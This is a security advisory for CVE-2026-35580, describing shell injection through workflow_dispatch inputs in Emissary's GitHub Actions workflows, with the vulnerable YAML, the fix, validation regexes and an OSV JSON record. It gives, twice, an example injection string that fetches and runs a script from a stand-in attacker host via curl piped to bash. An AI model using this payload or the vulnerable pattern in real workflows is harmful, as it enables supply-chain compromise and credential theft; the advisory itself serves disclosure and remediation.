GHSA-3G6G-GQ4R-XJM9

Vulnerability from github – Published: 2026-04-08 00:12 – Updated: 2026-04-08 00:12
VLAI?
Summary
Emissary has GitHub Actions Shell Injection via Workflow Inputs
Details

Summary

Three GitHub Actions workflow files contained 10 shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users.

Affected Files

Workflow file Injection points
.github/workflows/maven-version.yml 4
.github/workflows/cherrypick.yml 5
.github/workflows/maven-release.yml 1

Details

GitHub Actions ${{ }} expressions inside run: blocks are substituted before the shell interprets the command. When a workflow_dispatch input is placed directly in a run: block, an attacker who can trigger the workflow can break out of the intended command and execute arbitrary code.

Example — maven-version.yml (before fix)

- name: Set the name of the branch
  run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"

A malicious input such as 1.0.0"; curl attacker.com/backdoor.sh | bash; echo " would be interpolated directly into the shell, executing arbitrary commands with the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).

Impact

  • Arbitrary code execution within the CI/CD runner
  • Repository modification via the contents: write token (push malicious commits)
  • Supply chain poisoning — downstream users who clone or build receive compromised code
  • Credential exfiltration from the GitHub Actions environment

Remediation

Fixed in two PRs merged into release 8.39.0:

PR #1286 — Environment variable indirection

Replaced all direct ${{ inputs.* }} interpolation in run: blocks with environment variable indirection. Inputs are assigned to env: at the step level, then referenced as shell variables inside run:.

# After (safe — input is never interpreted by the shell parser)
- name: Set the name of the branch
  run: echo "PR_BRANCH=action/$IN_NEXT_VERSION" >> "$GITHUB_ENV"
  env:
    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}

PR #1288 — Input validation

Added strict regex validation steps that run before any input is used:

  • maven-version.yml: Validates next_version matches ^[a-zA-Z0-9._-]+$
  • maven-release.yml: Validates release_suffix matches ^[a-zA-Z0-9._-]+$
  • cherrypick.yml: Validates commits matches ^([0-9a-f]{7,40})(\s+[0-9a-f]{7,40})*$

All jobs now also use shell: bash via defaults.run.shell to ensure consistent shell behavior.

Workarounds

There is no workaround other than upgrading. Organizations that have forked Emissary should apply the same environment variable indirection and input validation patterns to their workflow files.

References

Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "gov.nsa.emissary:emissary"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.39.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35580"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:12:42Z",
    "nvd_published_at": "2026-04-07T17:16:33Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThree GitHub Actions workflow files contained **10 shell injection points** where\nuser-controlled `workflow_dispatch` inputs were interpolated directly into shell\ncommands via `${{ }}` expression syntax. An attacker with repository write access\ncould inject arbitrary shell commands, leading to repository poisoning and supply\nchain compromise affecting all downstream users.\n\n## Affected Files\n\n| Workflow file                            | Injection points |\n|------------------------------------------|------------------|\n| `.github/workflows/maven-version.yml`    | 4                |\n| `.github/workflows/cherrypick.yml`       | 5                |\n| `.github/workflows/maven-release.yml`    | 1                |\n\n## Details\n\nGitHub Actions `${{ }}` expressions inside `run:` blocks are substituted **before**\nthe shell interprets the command. When a `workflow_dispatch` input is placed directly\nin a `run:` block, an attacker who can trigger the workflow can break out of the\nintended command and execute arbitrary code.\n\n### Example \u2014 `maven-version.yml` (before fix)\n\n```yaml\n- name: Set the name of the branch\n  run: echo \"PR_BRANCH=action/${{ github.event.inputs.next_version }}\" \u003e\u003e \"$GITHUB_ENV\"\n```\n\nA malicious input such as `1.0.0\"; curl attacker.com/backdoor.sh | bash; echo \"`\nwould be interpolated directly into the shell, executing arbitrary commands with\nthe job\u0027s `GITHUB_TOKEN` permissions (`contents: write`, `pull-requests: write`).\n\n### Impact\n\n- Arbitrary code execution within the CI/CD runner\n- Repository modification via the `contents: write` token (push malicious commits)\n- Supply chain poisoning \u2014 downstream users who clone or build receive compromised code\n- Credential exfiltration from the GitHub Actions environment\n\n## Remediation\n\nFixed in two PRs merged into release 8.39.0:\n\n### PR #1286 \u2014 Environment variable indirection\n\nReplaced all direct `${{ inputs.* }}` interpolation in `run:` blocks with\nenvironment variable indirection. Inputs are assigned to `env:` at the step level,\nthen referenced as shell variables inside `run:`.\n\n```yaml\n# After (safe \u2014 input is never interpreted by the shell parser)\n- name: Set the name of the branch\n  run: echo \"PR_BRANCH=action/$IN_NEXT_VERSION\" \u003e\u003e \"$GITHUB_ENV\"\n  env:\n    IN_NEXT_VERSION: ${{ github.event.inputs.next_version }}\n```\n\n### PR #1288 \u2014 Input validation\n\nAdded strict regex validation steps that run before any input is used:\n\n- `maven-version.yml`: Validates `next_version` matches `^[a-zA-Z0-9._-]+$`\n- `maven-release.yml`: Validates `release_suffix` matches `^[a-zA-Z0-9._-]+$`\n- `cherrypick.yml`: Validates `commits` matches `^([0-9a-f]{7,40})(\\s+[0-9a-f]{7,40})*$`\n\nAll jobs now also use `shell: bash` via `defaults.run.shell` to ensure consistent\nshell behavior.\n\n## Workarounds\n\nThere is no workaround other than upgrading. Organizations that have forked\nEmissary should apply the same environment variable indirection and input\nvalidation patterns to their workflow files.\n\n## References\n\n- [PR #1286 \u2014 environment variable indirection](https://github.com/NationalSecurityAgency/emissary/pull/1286)\n- [PR #1288 \u2014 input validation](https://github.com/NationalSecurityAgency/emissary/pull/1288)\n- [GitHub Security Lab: Keeping your GitHub Actions and workflows secure](https://securitylab.github.com/resources/github-actions-untrusted-input/)\n- Original report: GHSA-wjqm-p579-x3ww",
  "id": "GHSA-3g6g-gq4r-xjm9",
  "modified": "2026-04-08T00:12:42Z",
  "published": "2026-04-08T00:12:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1286"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1288"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NationalSecurityAgency/emissary"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Emissary has GitHub Actions Shell Injection via Workflow Inputs"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.